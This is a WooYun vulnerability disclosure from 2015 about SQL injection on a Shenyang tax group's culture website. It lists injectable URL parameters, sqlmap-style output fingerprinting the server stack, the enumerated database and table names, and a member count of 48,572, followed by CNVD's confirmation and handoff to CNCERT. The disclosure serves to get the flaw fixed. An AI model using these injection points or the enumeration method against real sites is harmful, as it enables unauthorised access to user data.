当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0144899

漏洞标题:沈阳税务集团企业文化网SQL注入漏洞打包

相关厂商:cncert国家互联网应急中心

漏洞作者: 路人甲

提交时间:2015-10-09 22:39

修复时间:2015-11-28 08:48

公开时间:2015-11-28 08:48

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-09: 细节已通知厂商并且等待厂商处理中
2015-10-14: 厂商已经确认,细节仅向厂商公开
2015-10-24: 细节向核心白帽子及相关领域专家公开
2015-11-03: 细节向普通白帽子公开
2015-11-13: 细节向实习白帽子公开
2015-11-28: 细节向公众公开

简要描述:

详细说明:

http://**.**.**.**/news/detail.php?newsID=25
http://**.**.**.**/tv/tv_list.php?cat=2
http://**.**.**.**/news/list.php?cat=1
http://**.**.**.**/magazine/maga_list.php?cat=1
http://**.**.**.**/news/tlist.php?type=2
http://**.**.**.**/photo/?id=340
http://**.**.**.**/tv/tv_detail.php?vid=154
http://**.**.**.**/photo/slider_photo.php?id=340
[15:39:53] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.3.1, Apache 2.2.14
back-end DBMS: MySQL 5.0.11
[15:39:53] [INFO] fetching database names
[15:39:53] [INFO] the SQL query used returns 2 entries
[15:39:53] [INFO] resumed: "information_schema"
[15:39:53] [INFO] resumed: "wwwswdsdcom"
available databases [2]:
[*] information_schema
[*] wwwswdsdcom

漏洞证明:

Database: wwwswdsdcom
[216 tables]
+-------------------------+
| cdb_access |
| cdb_activities |
| cdb_activityapplies |
| cdb_addons |
| cdb_adminactions |
| cdb_admincustom |
| cdb_admingroups |
| cdb_adminnotes |
| cdb_adminsessions |
| cdb_advertisements |
| cdb_announcements |
| cdb_attachmentfields |
| cdb_attachments |
| cdb_attachpaymentlog |
| cdb_attachtypes |
| cdb_banned |
| cdb_bbcodes |
| cdb_caches |
| cdb_creditslog |
| cdb_crons |
| cdb_debateposts |
| cdb_debates |
| cdb_failedlogins |
| cdb_faqs |
| cdb_favoriteforums |
| cdb_favorites |
| cdb_favoritethreads |
| cdb_feeds |
| cdb_forumfields |
| cdb_forumlinks |
| cdb_forumrecommend |
| cdb_forums |
| cdb_imagetypes |
| cdb_invites |
| cdb_itempool |
| cdb_magiclog |
| cdb_magicmarket |
| cdb_magics |
| cdb_medallog |
| cdb_medals |
| cdb_memberfields |
| cdb_membermagics |
| cdb_memberrecommend |
| cdb_members |
| cdb_memberspaces |
| cdb_moderators |
| cdb_modworks |
| cdb_mytasks |
| cdb_navs |
| cdb_onlinelist |
| cdb_onlinetime |
| cdb_orders |
| cdb_paymentlog |
| cdb_pluginhooks |
| cdb_plugins |
| cdb_pluginvars |
| cdb_polloptions |
| cdb_polls |
| cdb_postposition |
| cdb_posts |
| cdb_profilefields |
| cdb_projects |
| cdb_promotions |
| cdb_prompt |
| cdb_promptmsgs |
| cdb_prompttype |
| cdb_ranks |
| cdb_ratelog |
| cdb_regips |
| cdb_relatedthreads |
| cdb_reportlog |
| cdb_request |
| cdb_rewardlog |
| cdb_rsscaches |
| cdb_searchindex |
| cdb_sessions |
| cdb_settings |
| cdb_smilies |
| cdb_spacecaches |
| cdb_stats |
| cdb_statvars |
| cdb_styles |
| cdb_stylevars |
| cdb_tags |
| cdb_tasks |
| cdb_taskvars |
| cdb_templates |
| cdb_threads |
| cdb_threadsmod |
| cdb_threadtags |
| cdb_threadtypes |
| cdb_tradecomments |
| cdb_tradelog |
| cdb_tradeoptionvars |
| cdb_trades |
| cdb_typemodels |
| cdb_typeoptions |
| cdb_typeoptionvars |
| cdb_typevars |
| cdb_uc_admins |
| cdb_uc_applications |
| cdb_uc_badwords |
| cdb_uc_domains |
| cdb_uc_failedlogins |
| cdb_uc_feeds |
| cdb_uc_friends |
| cdb_uc_mailqueue |
| cdb_uc_memberfields |
| cdb_uc_members |
| cdb_uc_mergemembers |
| cdb_uc_newpm |
| cdb_uc_notelist |
| cdb_uc_pms |
| cdb_uc_protectedmembers |
| cdb_uc_settings |
| cdb_uc_sqlcache |
| cdb_uc_tags |
| cdb_uc_vars |
| cdb_usergroups |
| cdb_validating |
| cdb_warnings |
| cdb_words |
| news_admin |
| news_index |
| news_title |
| news_type |
| sw_dltitle |
| sw_dltype |
| sw_guestbook |
| sw_magazine |
| sw_photo |
| sw_photo_type |
| sw_video |
| sw_video_publish |
| tg_ad |
| tg_friend |
| tg_wenhua |
| tg_wenhua_blog |
| uchome_ad |
| uchome_adminsession |
| uchome_album |
| uchome_appcreditlog |
| uchome_blacklist |
| uchome_block |
| uchome_blog |
| uchome_blogfield |
| uchome_cache |
| uchome_class |
| uchome_click |
| uchome_clickuser |
| uchome_comment |
| uchome_config |
| uchome_creditlog |
| uchome_creditrule |
| uchome_cron |
| uchome_data |
| uchome_docomment |
| uchome_doing |
| uchome_event |
| uchome_eventclass |
| uchome_eventfield |
| uchome_eventinvite |
| uchome_eventpic |
| uchome_feed |
| uchome_friend |
| uchome_friendguide |
| uchome_friendlog |
| uchome_invite |
| uchome_log |
| uchome_magic |
| uchome_magicinlog |
| uchome_magicstore |
| uchome_magicuselog |
| uchome_mailcron |
| uchome_mailqueue |
| uchome_member |
| uchome_mtag |
| uchome_mtaginvite |
| uchome_myapp |
| uchome_myinvite |
| uchome_notification |
| uchome_pic |
| uchome_picfield |
| uchome_poke |
| uchome_poll |
| uchome_pollfield |
| uchome_polloption |
| uchome_polluser |
| uchome_post |
| uchome_profield |
| uchome_profilefield |
| uchome_report |
| uchome_session |
| uchome_share |
| uchome_show |
| uchome_space |
| uchome_spacefield |
| uchome_spaceinfo |
| uchome_spacelog |
| uchome_stat |
| uchome_statuser |
| uchome_tag |
| uchome_tagblog |
| uchome_tagspace |
| uchome_task |
| uchome_thread |
| uchome_topic |
| uchome_topicuser |
| uchome_userapp |
| uchome_userappfield |
| uchome_userevent |
| uchome_usergroup |
| uchome_userlog |
| uchome_usermagic |
| uchome_usertask |
| uchome_visitor |
+-------------------------+
back-end DBMS: MySQL 5.0.11
Database: wwwswdsdcom
+-------------+---------+
| Table | Entries |
+-------------+---------+
| cdb_members | 48572 |
+-------------+---------+

1.png


修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-10-14 08:46

厂商回复:

CNVD确认所述情况,已经转由CNCERT下发给辽宁分中心,由其后续协调网站管理单位处置.

最新状态:

暂无